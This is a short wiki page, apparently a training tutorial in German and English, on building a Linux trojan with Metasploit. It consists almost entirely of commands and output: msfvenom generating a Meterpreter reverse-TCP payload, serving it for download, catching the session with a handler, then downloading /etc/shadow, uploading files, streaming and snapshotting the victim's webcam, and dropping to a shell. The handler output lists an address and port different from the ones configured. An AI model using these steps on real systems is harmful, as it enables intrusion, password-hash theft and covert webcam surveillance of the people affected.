Metasploit trojaner linux
Zur Navigation springen
Zur Suche springen
Create payload
- msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.10.101 LPORT=4444 -f elf > shell.elf
- chmod +x shell.elf
- cp shell.elf /var/www/html/
get Payload on the target computer an start
oder
- scp xinux@10.0.10.101:/var/www/html/shell.elf .
Launch Console
- msfconsole
Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00 Aiee, Killing Interrupt handler Kernel panic: Attempted to kill the idle task! In swapper task - not syncing =[ metasploit v4.16.6-dev ] + -- --=[ 1682 exploits - 964 auxiliary - 297 post ] + -- --=[ 498 payloads - 40 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- msf > use exploit/multi/handler
- msf exploit(handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
- msf exploit(handler) > set LHOST 10.0.10.101
LHOST => 10.0.10.101
- msf exploit(handler) > set LPORT 4444
LPORT => 4444
Start the exploits
- msf exploit(handler) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 10.81.1.91:6666
Viewing the sessions
- msf exploit(handler) > sessions
Metapreter File Management
pwd
- meterpreter > pwd
cd
- meterpreter > cd ..
- meterpreter > cd /etc
Download
- meterpreter > download shadow
upload
- meterpreter > cd /root
- meterpreter > upload /etc/hosts
Webcam
list
- meterpreter > webcam_list
1: Integrated Camera
Live stream
- meterpreter > webcam_stream
[*] Starting... [*] Preparing player... [*] Opening player at: XZLHwhtQ.html [*] Streaming...
snap
- meterpreter > webcam_snap
[*] Starting... [+] Got frame [*] Stopped Webcam shot saved to: /root/PDYSnlbK.jpeg
Starting a Shell (No Shell Prompt)
- meterpreter > shell
Process 14779 created. Channel 5 created.
Examples Shell
- ifconfig
- route -n
- netstat -ltpn
Quit
- STRG+c
Sysinfo
- meterpreter > sysinfo
Computer : gustavo.xinux.lan OS : Ubuntu 16.04 (Linux 4.4.0-97-generic) Architecture : x64 Meterpreter : x64/linux
Abschluss
- quit